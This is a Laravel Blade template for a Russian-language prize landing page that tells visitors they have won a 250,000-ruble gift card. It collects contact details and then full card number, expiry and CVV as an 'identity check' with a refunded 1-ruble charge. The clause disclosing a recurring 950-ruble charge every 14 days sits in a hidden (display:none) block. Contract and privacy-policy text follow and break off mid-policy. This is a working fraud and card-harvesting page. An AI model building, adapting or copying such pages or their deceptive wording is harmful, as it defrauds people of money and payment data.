<x-client.layouts.app>

    <section class="first_screen container flex-center-between form1" style="" id="main-page-form1">
        <div class="left_part">
            <h1 class="first_screen__title">Вы выиграли подарочную карту на <span class="text-green">250
             000</span> рублей!</h1>
            <p class="first_screen__text">Предложение действует в течение 24 часов!</p>
            <form class="first_screen__form ">
                <p class="first_screen__form_text">Заполните форму для того чтобы получить деньги</p>
                <div class="form_fields flex-start-between">
                    <div class="field_wrap">
                        <div class="field_icon flex-center">
                            <img src="fonts/user.svg" alt="#">
                        </div>
                        <input  class="text_field" name="firstname" id="firstname" data-error="Заполните" data-name="Имя" placeholder="Имя" type="text">
                    </div>

                    <div class="field_wrap">
                        <div class="field_icon flex-center">
                            <img src="fonts/user.svg" alt="#">
                        </div>
                        <input  class="text_field" placeholder="Фамилия" name="lastname" id="lastname" data-error="Заполните" data-name="Фамилия"  type="text">
                    </div>

                    <div class="field_wrap">
                        <div class="field_icon flex-center">
                            <img src="fonts/phone.svg" alt="#">
                        </div>
                        <input  class="text_field" placeholder="Телефон" type="phone" id="tel" data-error="Заполните" data-name="Телефон" name="phone">
                    </div>

                    <div class="field_wrap">
                        <div class="field_icon flex-center">
                            <img src="fonts/mail.svg" alt="#">
                        </div>
                        <input  class="text_field" placeholder="E-mail" name="email" id="email" data-error="Заполните" data-name="Емейл" type="text">
                    </div>
                </div>
                <div class="form_footer flex-center-between">
                    <p class="form_footer__text">
                        Нажимая кнопку продолжить я соглашаюсь с
                        <a class="show_text_popup" href="#">обработкой персональных данных</a>
                    </p>
                    <button type="button" class="button button-continue button-blank form__submit_btn green-btn button-continue">Продолжить</button>
                </div>
            </form>
        </div>
        <div class="right_part">
            <img src="img/right.png" alt="#">
        </div>
    </section>

    <!-- POPUP CARD START -->
    <div class="form2" id="main-page-form2" style="    text-align: center;
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;">
        <p class="first_screen__title">Подтвердите свою личность</p>
        <p class="first_screen__text">Вам нужно ввести данные карты для того, чтобы мы подтвердили Вашу личность и закрепили за Вами участие в розыгрыше. Будет списан 1 руб с Вашей карты и сразу возмещён обратно</p>
        <div class="card-form__wrapper" style="margin-top: 40px;">
            <div class="card-wrapper"></div>
            <form id="form" action="" class="form" style="margin-top: 40px;">
                <div class="input__wrapper input__wrapper_name" style="width: 100%;">
                    <input type="hidden" data-cp="name">
                    <input type="text" id="name" data-cp="name" class="form__input input-name" required>
                    <span class="custom-placeholder">Имя и фамилия</span>
                    <svg width="18" height="14" viewBox="0 0 18 14" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M0 0.52002V13.48H18V0.52002H0ZM16.56 3.85846L9 8.14471L1.44 3.85846V3.00908L9 7.29533L16.56 3.00908V3.85846Z" fill="white"/>
                    </svg>                    <span class="error__text"></span>
                </div>
                <div class="input__wrapper input__wrapper_cardNumber" style="width: 100%;">
                    <input type="hidden" data-cp="cardNumber">
                    <input data-cp="cardNumber"  id="card-number" type="text" class="form__input" placeholder=" ">
                    <span class="custom-placeholder">Номер банковской карты</span>
                    <svg width="18" height="12" viewBox="0 0 18 12" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M15.48 0.23999H2.51997C1.52716 0.23999 0.719971 1.04718 0.719971 2.03999V9.95999C0.719971 10.9528 1.52716 11.76 2.51997 11.76H15.48C16.4728 11.76 17.28 10.9528 17.28 9.95999V2.03999C17.28 1.04718 16.4728 0.23999 15.48 0.23999ZM8.99997 6.35999H3.23997V5.63999H8.99997V6.35999ZM16.56 4.55999H1.43997V2.75999H16.56V4.55999Z" fill="#A8A8A8"/>
                    </svg>                    <span class="error__text"></span>
                </div>
                <div class="form__group" style="width: 100%;">
                    <div class="input__wrapper input__wrapper_expDateMonth input__wrapper_expDateYear" style="width: 100%;">
                        <input type="hidden" data-cp="expDateMonth">
                        <input type="hidden" data-cp="expDateYear">
                        <input id="card-expiry" type="text" class="form__input" placeholder=" ">
                        <span class="custom-placeholder">ММ/ГГ</span>
                        <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M4.31997 0C3.92622 0 3.59997 0.32625 3.59997 0.72V1.44H1.43997C1.02231 1.44 0.719971 1.74234 0.719971 2.16V4.68H17.28V2.16C17.28 1.74234 16.9776 1.44 16.56 1.44H14.4V0.72C14.4 0.32625 14.0737 0 13.68 0H12.96C12.5662 0 12.24 0.32625 12.24 0.72V1.44H5.75997V0.72C5.75997 0.32625 5.43372 0 5.03997 0H4.31997ZM4.31997 0.72H5.03997V2.88H4.31997V0.72ZM12.96 0.72H13.68V2.88H12.96V0.72ZM0.719971 5.4V16.56C0.719971 16.958 1.042 17.28 1.43997 17.28H16.56C16.9579 17.28 17.28 16.958 17.28 16.56V5.4H0.719971ZM9.06747 8.25328H9.76638V11.1305H10.35V11.7127H9.76638V12.7898H9.06747V11.7127H7.12263V10.9814L9.06747 8.25328ZM9.05481 9.135L7.69356 11.1305H9.06747V9.135H9.05481Z" fill="#A8A8A8"/>
                        </svg>                        <span class="error__text"></span>
                    </div>

                    <div class="input__wrapper input__wrapper_cvv" style="width: 100%;">
                        <input type="hidden" data-cp="cvv">
                        <input data-cp="cvv" id="card-cvc" type="text" class="form__input" placeholder=" ">
                        <span class="custom-placeholder">CVV</span>
                        <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M14.1454 0.825439L12.0909 2.87997L14.1454 4.9345L14.6545 4.42544L13.469 3.23997H14.76C15.7516 3.23997 16.56 4.04833 16.56 5.03997V6.83997H17.28V5.03997C17.28 3.65561 16.1443 2.51997 14.76 2.51997H13.469L14.6545 1.3345L14.1454 0.825439ZM2.15997 2.51997C1.36581 2.51997 0.719971 3.16581 0.719971 3.95997V8.99997C0.719971 9.79413 1.36581 10.44 2.15997 10.44H6.11997V8.99997C6.11997 7.80909 7.08909 6.83997 8.27997 6.83997H11.16V3.95997C11.16 3.16581 10.5141 2.51997 9.71997 2.51997H2.15997ZM1.43997 4.67997H10.44V6.11997H1.43997V4.67997ZM8.27997 7.55997C7.48581 7.55997 6.83997 8.20581 6.83997 8.99997V14.04C6.83997 14.8341 7.48581 15.48 8.27997 15.48H15.84C16.6341 15.48 17.28 14.8341 17.28 14.04V8.99997C17.28 8.20581 16.6341 7.55997 15.84 7.55997H8.27997ZM7.55997 9.71997H16.56V11.16H7.55997V9.71997ZM0.719971 11.16V12.96C0.719971 14.3443 1.85561 15.48 3.23997 15.48H4.53091L3.34544 16.6654L3.8545 17.1745L5.90903 15.12L3.8545 13.0654L3.34544 13.5745L4.53091 14.76H3.23997C2.24833 14.76 1.43997 13.9516 1.43997 12.96V11.16H0.719971Z" fill="#A8A8A8"/>
                        </svg>
                    </div>
                </div>
            </form>
        </div>
        <div class="input__wrapper" style="margin-top: 20px">
            <button type="button" class="button button-continue button-blank form__submit_btn green-btn button-continue button button-submit">Принять участие</button>
        </div>

    </div>
    <div class="legal-block">
        <div class="container">
            <div class="row">
                <div class="col-md-12 center">
                    <div class="text-center mb-0">
                        <div class="terms-info">
                            <p class="legal-block__title">
                                Ты можешь выиграть карут на 250 000 руб уже сегодня! Участвуй в наших розыгрышах с
                                блогерами! Мы связываемся с победителем по электронной почте.
                            </p>
                        </div>
                    </div>
                </div>
            </div>
            <div class="row" style="display: none;">
                <div class="col-md-4">
                    <h4 class="legal-block__title">Как я могу выиграть?</h4>
                    <div class="legal-block__text">
                        Благодаря подписке ты также участвуешь в наших конкурсах, сейчас проходит кокнурс с общим
                        призовым фондом 250 000 руб. Мы выбираем победителя из каждых 600 участников. Следующий
                        победитель будет выбран 19.11.2021 г. и получит уведомление по электронной почте.
                    </div>
                </div>
                <div class="col-md-4">
                    <h4 class="legal-block__title">Есть какие-то скрытые комиссии?</h4>
                    <div class="legal-block__text">
                        Мы гарантируем, что нашим участникам предоставляется подробная история транзакций, и благодаря этому они знают, за что они платят. Информация о кредитной карте требуется только для облегчения будущих покупок. В выписке по кредитной карте не будет никаких сборов, если ты отменишь подписку на веб-сайте wingift.be в личном кабинете.
                    </div>
                </div>
                <div class="col-md-4">
                    <h4 class="legal-block__title">Зачем мне нужна платежная информация?</h4>
                    <div class="legal-block__text">
                        Оставив свои контактные данные, ты получишь 3-дневную пробную версию программы нашего партнера. Если ты продолжишь подписку после 3-дневного пробного периода, с твоей кредитной карты будет сниматься 950 рублей каждые 14 дней. Когда сумма будет списана с карты, ты получишь доступ к услугам, которые предназначены исключительно для участников веб-сайта wingift.be на 14 дней.
                    </div>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-md-4">
                    <div style="text-align: center; padding-top: 15px;font-weight: 600;">Мы принимаем кредитные карты</div>
                    <div style="text-align: center; padding-bottom: 15px">
                        <img class="cards img-fluid" alt="paycards" src="img/paycards.png">
                    </div>
                </div>
            </div>
        </div>
        <div class="wrapper-button">
            <span class="show_text_popup_open" style="cursor: pointer" > Политика конфиденциальности &nbsp; </span>
            <span  class="term_open"  style="cursor: pointer"><small>|&nbsp;&nbsp;</small> Условия и положения
          </span>
        </div>
    </div>
    <!-- POPUP CARD END -->
    <!-- POPUP SUCCESS START -->
    <div class="popup_success popup_wrap" >
        <div class="popup_content">
            <div class="close_btn flex-center"></div>
            <div class="img_wrap">
                <img src="fonts/Approval.svg" alt="">
            </div>
            <h3 class="title">Поздравляем! Операция прошла успешно</h3>
            <p class="text">Ожидайте перевод в течении 48 часов</p>
            <button class="close_popup_button green-btn">Ок</button>
        </div>
    </div>
    <!-- POPUP SUCCESS END -->

    <!-- POPUP SUCCESS START -->
    <div class="popup_error popup_wrap" >
        <div class="popup_content">
            <div class="close_btn flex-center"></div>
            <div class="img_wrap">
                <img src="fonts/Error_icon.svg" alt="">
            </div>
            <h3 class="title">Чтото пошло <span class="text-red">не так :(</span></h3>
            <p class="text">Попробуйте еще раз в спустя 5 минут.</p>
            <button class="close_popup_button green-btn">Ок</button>
        </div>
    </div>
    <!-- POPUP SUCCESS END -->

    <!-- POPUP PRIVACY POLICY START -->
    <div class="popup_policy popup_wrap">
        <div class="popup_content">
            <div class="close_btn flex-center"></div>
            <div class="texts">
                <h2 class="title">Публичная оферта</h2>

                Договор (лицензионное соглашение) — публичная оферта
                ООО «СЕРЖ» в лице Генерального директора Булгаковой Ольги Сергеевны, действующего на основании Устава, именуемое в дальнейшем «Правообладатель» или «Продавец», с одной стороны, и пользователь сети Интернет, именуемый в дальнейшем «Пользователь» или «Подписчик»; «Клиент», с другой стороны, совместно именуемые «Стороны», заключили настоящий лицензионный договор (далее – «Договор»)

                Договор, в соответствии со статьей 435 и частью 2 статьи 437 Гражданского кодекса Российской Федерации, является публичной офертой (предложением) в адрес неограниченного числа лиц, пользователей сети Интернет.

                В соответствии со статьей 438 Гражданского Кодекса Российской Федерации, полным и безоговорочным акцептом (принятием) Договора является подтверждение Подписчиком своего согласия с условиями Договора или осуществление им добровольного платежа.

                В соответствии с пунктом 5 статьи 1286 Гражданского Кодекса Российской Федерации, Договор заключается между Пользователем и Правообладателем в упрощенном порядке и является договором присоединения.

                1. Термины, используемые в договоре
                1.1. Подписчик — пользователь сети Интернет, принявший условия Договора, зарегистрировавшийся на Сайте Продавца и осуществивший авансовый платеж за Использование Базы данных.

                1.2. Розыгрыши — мероприятия с призовым фондом проводимые различными медиа личностями/площадками на нашей платформе, представленные в электронном виде в различных форматах в составе Базы данных (Каталога), размещенной на Сайте Продавца.

                1.3. База данных (каталог) — информационный ресурс, представляющий собой совокупность Розыгрышей и предоставляющий Подписчику возможности поиска Розыгрыша по заданным параметрам и их ранжирования – с целью ознакомления и выбора, включая возможность получения доступа к полному содержанию розыгрыша и его призового фонда в электронном текстовом формате. Исключительное право на использование Базы данных принадлежит Правообладателю.

                1.4. Логин и Пароль — два уникальных набора символов, идентифицирующих Подписчика, позволяющих Подписчику осуществлять доступ к Контенту.

                1.5. Сайт Продавца — информационный ресурс в сети Интернет, принадлежащий Продавцу, расположенный по адресу https://wingift.be/, и принадлежащие Продавцу.

                1.6. Использование Базы данных (Подписка) — выбор и открытие Подписчиком Розыгрышей (для ознакомления,  просмотра условия, участия) через браузер.

                1.7. Биллинг — система учета платежей.

                1.8. Учетная запись – данные Пользователя, хранящиеся на серверах Сайта Продавца.

                2. Предмет договора. Условия об интеллектуальных правах.
                2.1. Продавец предоставляет Пользователю право возмездного использования Базы данных на условиях простой (неисключительной) лицензии в установленных Договором пределах (принимать участие в Розыгрышах, представленных в Каталоге, через браузер).

                2.2. Договор устанавливает условия использования Базы данных. Использование Базы данных разрешается только на условиях Договора. Если Пользователь не принимает условия Договора в полном объёме, Пользователь не имеет права использовать Базу данных.

                2.3. Исключительное право на использование Базы данных принадлежит Правообладателю.

                2.4. Договор не предусматривает передачу прав на Базу данных. Договор предоставляет Пользователю ограниченное право ее использования.

                2.5. Право использования Базы данных предоставляется только Пользователю.

                2.6. Пользователь может участвовать в Розыгрыше только теми способами, которые указаны в Договоре

                3. Права и обязанности сторон
                3.1. Права и обязанности Продавца
                3.1.1. Предоставить Пользователю право использования Базы данных путем предоставления доступа Пользователю к Каталогу через учетную запись на сервисе Wingift.

                3.1.2. Предоставлять Подписчику возможность Использования Базы данных не позднее 24 часов с момента подтверждения Биллингом произведенной оплаты и идентификации Подписчика как плательщика произведенного платежа.

                3.1.3. Не разглашать третьим лицам Логин и Пароль, адрес электронной почты Подписчика, а также прочие сведения, полученные от Подписчика при регистрации.

                3.1.4. Изменять условия Договора и/или его Приложений. При этом уведомлять Подписчика об изменениях условий Договора и/или его Приложений путем размещения (публикации) соответствующей информации на Сайте Продавца. Такие изменения вступают в силу с момента их размещения, если иное не указано в соответствующей публикации.

                3.2. Права и обязанности Подписчика
                3.2.1. Зарегистрироваться на Сайте Продавца. Установить Логин и Пароль, уникальность которых подтвeрждаeтся Продавцом. Также Пользователь может пройти процедуру автоматической регистрации по факту оплаты, получить сгенерированный системой логин и пароль и сохранить их в надежном месте. При этом строго и неукоснительно следовать указаниям Продавца о порядке регистрации, размещенном на Сайте Продавца.

                3.2.2. Производить уплату вознаграждения за Использование Базы данных согласно п.4 Договора и самостоятельно отслеживать автоматическое списание денежных средств за автоматическое продление подписки.

                3.2.3. Обеспечивать конфиденциальность Логина и Пароля, сообщенного при регистрации.

                3.2.4. Использовать Базу данных только на условиях Договора: пользоваться доступом к Каталогу в личных целях (для выбора и участия в Розыгрышах).

                3.2.5. Подписчик не имеет права Использования более чем на двух устройствах одновременно.

                3.2.6. Подписчик не имеет права:

                - вносить какие-либо изменения в структуру и/или коды Базы данных, в том числе в ее программное обеспечение;

                - передавать права (предоставлять сублицензии) на Базу данных третьим лицам;

                - использовать Базу данных как-либо иначе, кроме как на условиях Договора;

                - передавать свой аккаунт третьим лицам;

                - переделывать, изменять условия Розыгрышей;

                - использовать Розыгрышей любым иным способам, кроме как в личных целях (для участия);

                - участвовать в Розыгрышах по окончании срока Подписки. По окончании срока Подписки Подписчик обязан отменить свое участие во всех розыгрышах;

                - использовать любые программы (скрипты) для сбора информации и/или взаимодействия с Сайтом и его сервисами, за исключением доступных на Сайте средств навигации.

                Несоблюдение требований п.3.2.6. Договора является нарушением законодательства об интеллектуальных правах и преследуется по закону.

                3.2.7. Вся информация, размещенная на Сайтах Продавца о порядке использования Базы данных (Каталога), осуществления оплаты и прочих особенностях исполнения Договора является неотъемлемой частью Договора и обязательна к исполнению Подписчиком.

                4. Условия оплаты
                4.1. Подписчик производит выплату вознаграждения за использование Базы данных путем осуществления авансового платежа за подписку в рублях на условиях, указанных на Сайте Продавца.

                4.2. Продавец вправе в одностороннем порядке изменять действующие условия оплаты (размер вознаграждения за использование Базы данных) путем размещения соответствующей информации на Сайте Продавца (см. п.3.1.4. выше). Любое изменение условий оплаты не касается ранее выплаченных вознаграждений за использования Базы данных (уже оплаченных периодов подписки).

                4.3 На сайте https://wingift.be на странице оплаты подписки Подписчик перед оплатой подписки предупреждается об автоматическом списании средств при выборе средства оплаты и о возможностях его отмены. Оплачивая подписку, Подписчик принимает условия автоматического продления подписки. При этом, Продавец не обязан направлять Подписчику уведомления о предстоящем списании денежных средств на следующий период. Подписчик может в любой момент отказаться от автоматического списания средств заполнив обратную форму связи на сайте https://wingift.be и описав свое желание в службу поддержки сервиса Wingift.

                4.4 Если оплата производится банковской картой c помощью процессингового центра https://cloudpayments.ru/ , и автоматическое списание включено, то после окончания подписки Продавец автоматически спишет с карты подписчика сумму подписки за один месяц, с периодичностью не чаще одного раза в месяц, на сумму стоимости месячной подписки по выбранному тарифу. Срок подписки, выбранный при оплате ранее, значения не имеет.

                5. Ответственность Сторон. Ограничение ответственности Продавца
                5.1. Подписчик принимает на себя полную ответственность и риски, связанные с использованием Каталога.

                5.2. Подписчик полностью несет ответственность за использование третьими лицами Логина и Пароля.

                5.3. Подписчик полностью несет ответственность за использование третьими лицами информации, передаваемой Продавцом на адрес электронной почты, указанный Подписчиком при регистрации.

                5.4. Продавец не несет ответственности за любые расходы Подписчика или прямой либо косвенный ущерб, который может быть нанесен Подписчику вследствие использования Каталога.

                5.5. Продавец нe нeсeт отвeтствeнности за качество доступа к Каталогу через сеть Интернет.

                5.6. Ни при каких обстоятельствах Продавец не несет ответственности за использование третьими лицами Логина и Пароля.

                5.7. База данных (Каталог) предоставляется на условиях «как есть» (as is).

                5.8. Продавец не несет ответственности, если Подписчик, оплативший и получивший доступ к Базе данных (Каталогу) не воспользовался предоставленной ему Подпиской в течение установленного срока такой Подписки, в том числе если Подписчик не отключил авто списание денежных средств за авто продление подписки.

                5.9. Правообладатель не предоставляет никаких гарантий в отношении безошибочной работы Базы данных или отдельных её компонентов и/или функций, соответствия Базы данных конкретным целям и ожиданиям Пользователя, не гарантирует достоверность, точность, полноту и своевременность Данных, а также не предоставляет никаких иных гарантий, прямо не указанных в Договоре.

                5.10. Правообладатель не несет ответственности за какие-либо прямые или косвенные последствия какого-либо использования или невозможности использования Базы данных и/или прямой или косвенный ущерб, понесенный Подписчиком и/или третьими лицами в результате какого-либо использования, неиспользования или невозможности использования Базы данных, в том числе из-за возможных ошибок или сбоев/дефектов в работе Базы данных, программного обеспечения и/или оборудования, потерь и повреждений данных, ошибок обработки или отображения данных, задержек в передаче данных и других сбоев, случившихся не по вине Продавца.

                6. Срок действия договора
                6.1. Договор вступает в силу с момента поступления первого авансового платежа от Подписчика и действует до полного исполнения Сторонами своих обязательств.

                7. Обстоятельства непреодолимой силы
                7.1. Стороны освобождаются от ответственности за частичное или полное неисполнение обязательств по настоящему Договору в случае, если такое неисполнение явилось прямым следствием обстоятельств непреодолимой силы (форс-мажорных обстоятельств), возникших после заключения Договора, в результате событий чрезвычайного характера, а именно: пожара, наводнения, урагана и землетрясения или наложения органами государственной власти ограничений на деятельность любой из Сторон, и если эти обстоятельства Стороны не могли ни предвидеть, ни предотвратить разумными мерами.

                8. Прочие условия
                8.1. В случае, если какое-либо положение или какая-либо часть положения Договора признаны недействительными или не имеющими юридической силы, остальные положения и части положений Договора остаются в полной силе и действии.

                8.2. Все Приложения к настоящему Договору являются его неотъемлемой частью. Все дополнительные условия/правила, размещенные на Сайте Продавца (включая, но не ограничиваясь, условия проведения различных акций, иные правила и т.п.), являются Приложениями к Договору и обязательны к исполнению Сторонами.

                8.3. Во всем остальном Стороны договорились руководствоваться действующим законодательством Российской Федерации.

                8.4. Продавец вправе вносить изменения в Договор с обязательным размещением соответствующей информации на Сайте Продавца.

                8.5. По всем возникающим вопросам Подписчик вправе обращаться в Службу поддержки Продавца по адресу электронной почты: help@wingift.be

                9. Разрешение споров
                9.1. Споры и разногласия, которые могут возникнуть по данному Договору, решаются путем соблюдения досудебного (претензионного) порядка. Срок рассмотрения Продавцом претензии — 7 (семь) календарных дней с момента ее получения от Подписчика.

                9.2. Если Стороны не придут к соглашению, эти споры и разногласия разрешаются в судебном порядке согласно действующему законодательству Российской Федерации.

                10. Уведомление об обработке персональных данных
                10.1. Покупатель, соглашаясь с условиями настоящего Договора, дает свое согласие Продавцу на обработку своих персональных данных.

                10.2. Согласие дается на обработку следующих персональных данных: фамилия, имя, отчество; адреса электронной почты; номера контактных телефонов; пол; фотография; сведения о страницах в социальных сетях; пользовательские данные (сведения о местоположении; какие страницы открывает и на какие кнопки нажимает Пользователь; IP-адрес; SID); сведения о поступающих платежах; реквизиты банковского счета.

                10.3. В ходе обработки с персональными данными будут совершены следующие действия: сбор; запись; систематизация; накопление; хранение; уточнение (обновление, изменение); извлечение; использование; передача (предоставление, доступ); блокирование; удаление; уничтожение.

                10.4. Продавец может использовать персональные данные Покупателя для его идентификации, уточнения данных платежа, предоставления персонализированных сервисов, обратной связи с Покупателем, обработки заявок и запросов, выполнения обезличенных статистических вычислений, улучшения качества услуг, оказываемых Покупателю.

                10.5. Персональные данные Покупателя обрабатываются в течение действия настоящего Договора. Покупатель вправе отозвать свое согласие на обработку своих персональных данных путем направления письменного заявления по адресу, указанному в Договоре.

                10.7. С Политикой Продавца в отношении обработки персональных данных можно ознакомиться на сайте https://wingift.be

            </div>
        </div>
    </div>


    <div class="term_popup popup_wrap">
        <div class="popup_content">
            <div class="close_btn flex-center"></div>
            <div class="texts">
                <h2 class="title">Условия и положения</h2>
                Политика компании в отношении обработки персональных данных



                1. Общие положения

                Политика обработки персональных данных (далее – Политика) разработана в соответствии с Федеральным законом от 27.07.2006. №152-ФЗ «О персональных данных» (далее – ФЗ-152).

                Настоящая Политика определяет порядок обработки персональных данных и меры по обеспечению безопасности персональных данных в ООО «СЕРЖ» (далее – Оператор) с целью защиты прав и свобод человека и гражданина при обработке его персональных данных, в том числе защиты прав на неприкосновенность частной жизни, личную и семейную тайну.

                В Политике используются следующие основные понятия:

                автоматизированная обработка персональных данных – обработка персональных данных с помощью средств вычислительной техники;
                блокирование персональных данных - временное прекращение обработки персональных данных (за исключением случаев, если обработка необходима для уточнения персональных данных);
                информационная система персональных данных - совокупность содержащихся в базах данных персональных данных, и обеспечивающих их обработку информационных технологий и технических средств;
                обезличивание персональных данных - действия, в результате которых невозможно определить без использования дополнительной информации принадлежность персональных данных конкретному субъекту персональных данных;
                обработка персональных данных - любое действие (операция) или совокупность действий (операций), совершаемых с использованием средств автоматизации или без использования таких средств с персональными данными, включая сбор, запись, систематизацию, накопление, хранение, уточнение (обновление, изменение), извлечение, использование, передачу (распространение, предоставление, доступ), обезличивание, блокирование, удаление, уничтожение персональных данных;
                оператор - государственный орган, муниципальный орган, юридическое или физическое лицо, самостоятельно или совместно с другими лицами организующие и (или) осуществляющие обработку персональных данных, а также определяющие цели обработки персональных данных, состав персональных данных, подлежащих обработке, действия (операции), совершаемые с персональными данными; персональные данные – любая информация, относящаяся к прямо или косвенно определенному или определяемому физическому лицу (субъекту персональных данных); предоставление персональных данных – действия, направленные на раскрытие персональных данных определенному лицу или определенному кругу лиц;
                распространение персональных данных - действия, направленные на раскрытие персональных данных неопределенному кругу лиц (передача персональных данных) или на ознакомление с персональными данными неограниченного круга лиц, в том числе обнародование персональных данных в средствах массовой информации, размещение в информационно-телекоммуникационных сетях или предоставление доступа к персональным данным каким-либо иным способом;
                трансграничная передача персональных данных - передача персональных данных на территорию иностранного государства органу власти иностранного государства, иностранному физическому или иностранному юридическому лицу;
                уничтожение персональных данных - действия, в результате которых невозможно восстановить содержание персональных данных в информационной системе персональных данных и (или) результате которых уничтожаются материальные носители персональных данных. Компания обязана опубликовать или иным образом обеспечить неограниченный доступ к настоящей Политике обработки персональных данных в соответствии с ч. 2 ст. 18.1. ФЗ-152.
                Компания обязана опубликовать или иным образом обеспечить неограниченный доступ к настоящей Политике обработки персональных данных в соответствии с ч. 2 ст. 18.1. ФЗ-152.



                2. Принципы и условия обработки персональных данных

                2.1 Принципы обработки персональных данных

                Обработка персональных данных у Оператора осуществляется на основе следующих принципов:

                законности и справедливой основы;
                ограничения обработки персональных данных достижением конкретных, заранее определенных и законных целей;
                недопущения обработки персональных данных, несовместимой с целями сбора персональных данных; недопущения объединения баз данных, содержащих персональные данные, обработка которых осуществляется в целях, * несовместимых между собой;
                обработки только тех персональных данных, которые отвечают целям их обработки;
                соответствия содержания и объема обрабатываемых персональных данных заявленным целям обработки;
                недопущения обработки персональных данных, избыточных по отношению к заявленным целям их обработки; обеспечения точности, достаточности и актуальности персональных данных по отношению к целям обработки * персональных данных;
                уничтожения либо обезличивания персональных данных по достижении целей их обработки или в случае утраты необходимости в достижении этих целей, при невозможности устранения Оператором допущенных нарушений персональных данных, если иное не предусмотрено федеральным законом.
                2.2 Условия обработки персональных данных

                Оператор производит обработку персональных данных при наличии хотя бы одного из следующих условий:

                обработка персональных данных осуществляется с согласия субъекта персональных данных на обработку его персональных данных;
                обработка персональных данных необходима для достижения целей, предусмотренных международным договором Российской Федерации или законом, для осуществления и выполнения возложенных законодательством Российской Федерации на оператора функций, полномочий и обязанностей;
                обработка персональных данных необходима для осуществления правосудия, исполнения судебного акта, акта другого органа или должностного лица, подлежащих исполнению в соответствии с законодательством Российской Федерации об исполнительном производстве;
                обработка персональных данных необходима для исполнения договора, стороной которого либо выгодоприобретателем или поручителем по которому является субъект персональных данных, а также для заключения договора по инициативе субъекта персональных данных или договора, по которому субъект персональных данных будет являться выгодоприобретателем или поручителем;
                обработка персональных данных необходима для осуществления прав и законных интересов оператора или третьих лиц либо для достижения общественно значимых целей при условии, что при этом не нарушаются права и свободы субъекта персональных данных;
                осуществляется обработка персональных данных, доступ неограниченного круга лиц к которым предоставлен субъектом персональных данных либо по его просьбе (далее - общедоступные персональные данные);
                осуществляется обработка персональных данных, подлежащих опубликованию или обязательному раскрытию в соответствии с федеральным законом.
                2.3 Конфиденциальность персональных данных

                Оператор и иные лица, получившие доступ к персональным данным, обязаны не раскрывать третьим лицам и не распространять персональные данные без согласия субъекта персональных данных, если иное не предусмотрено федеральным законом.



                2.4 Общедоступные источники персональных данных

                В целях информационного обеспечения у Оператора могут создаваться общедоступные источники персональных данных субъектов персональных данных, в том числе справочники и адресные книги. В общедоступные источники персональных данных с письменного согласия субъекта персональных данных могут включаться его фамилия, имя, отчество, дата и место рождения, должность, номера контактных телефонов, адрес электронной почты и иные персональные данные, сообщаемые субъектом персональных данных.

                Сведения о субъекте персональных данных должны быть в любое время исключены из общедоступных источников персональных данных по требованию субъекта персональных данных, уполномоченного органа по защите прав субъектов персональных данных либо по решению суда.



                2.5 Специальные категории персональных данных

                Обработка Оператором специальных категорий персональных данных, касающихся расовой, национальной принадлежности, политических взглядов, религиозных или философских убеждений, состояния здоровья, интимной жизни, допускается в случаях, если:

                субъект персональных данных дал согласие в письменной форме на обработку своих персональных данных;
                персональные данные сделаны общедоступными субъектом персональных данных;
                обработка персональных данных осуществляется в соответствии с законодательством о государственной социальной помощи, трудовым законодательством, законодательством Российской Федерации о пенсиях по государственному пенсионному обеспечению, о трудовых пенсиях;
                обработка персональных данных необходима для защиты жизни, здоровья или иных жизненно важных интересов субъекта персональных данных либо жизни, здоровья или иных жизненно важных интересов других лиц и получение согласия субъекта персональных данных невозможно;
                обработка персональных данных осуществляется в медико-профилактических целях, в целях установления медицинского диагноза, оказания медицинских и медико-социальных услуг при условии, что обработка персональных данных осуществляется лицом, профессионально занимающимся медицинской деятельностью и обязанным в соответствии с законодательством Российской Федерации сохранять врачебную тайну;
                обработка персональных данных необходима для установления или осуществления прав субъекта персональных данных или третьих лиц, а равно и в связи с осуществлением правосудия;
                обработка персональных данных осуществляется в соответствии с законодательством об обязательных видах страхования, со страховым законодательством.
                Обработка специальных категорий персональных данных, осуществлявшаяся в случаях, предусмотренных пунктом 4 статьи 10 ФЗ-152 должна быть незамедлительно прекращена, если устранены причины, вследствие которых осуществлялась их обработка, если иное не установлено федеральным законом.

                Обработка персональных данных о судимости может осуществляться Оператором исключительно в случаях и в порядке, которые определяются в соответствии с федеральными законами.



                2.6 Биометрические персональные данные

                Сведения, которые характеризуют физиологические и биологические особенности человека, на основании которых можно установить его личность - биометрические персональные данные - могут обрабатываться Оператором только при наличии согласия субъекта персональных данных в письменной форме.



                2.7 Поручение обработки персональных данных другому лицу

                Оператор вправе поручить обработку персональных данных другому лицу с согласия субъекта персональных данных, если иное не предусмотрено федеральным законом, на основании заключаемого с этим лицом договора. Лицо, осуществляющее обработку персональных данных по поручению Оператора, обязано соблюдать принципы и правила обработки персональных данных, предусмотренные ФЗ-152 и настоящей Политикой.



                2.8 Обработка персональных данных граждан Российской Федерации

                В соответствии со статьей 2 Федерального закона от 21 июля 2014 года N 242-ФЗ «О внесении изменений в отдельные законодательные акты Российской Федерации в части уточнения порядка обработки персональных данных в информационно-телекоммуникационных сетях» при сборе персональных данных, в том числе посредством информационно-телекоммуникационной сети "Интернет", оператор обязан обеспечить запись, систематизацию, накопление, хранение, уточнение (обновление, изменение), извлечение персональных данных граждан Российской Федерации с использованием баз данных, находящихся на территории Российской Федерации, за исключением случаев:

                обработка персональных данных необходима для достижения целей, предусмотренных международным договором Российской Федерации или законом, для осуществления и выполнения возложенных законодательством Российской Федерации на оператора функций, полномочий и обязанностей;
                обработка персональных данных необходима для осуществления правосудия, исполнения судебного акта, акта другого органа или должностного лица, подлежащих исполнению в соответствии с законодательством Российской Федерации об исполнительном производстве (далее - исполнение судебного акта);
                обработка персональных данных необходима для исполнения полномочий федеральных органов исполнительной власти, органов государственных внебюджетных фондов, исполнительных органов государственной власти субъектов Российской Федерации, органов местного самоуправления и функций организаций, участвующих в предоставлении соответственно государственных и муниципальных услуг, предусмотренных Федеральным законом от 27 июля 2010 года N 210-ФЗ «Об организации предоставления государственных и муниципальных услуг», включая регистрацию субъекта персональных данных на едином портале государственных и муниципальных услуг и (или) региональных порталах государственных и муниципальных услуг;
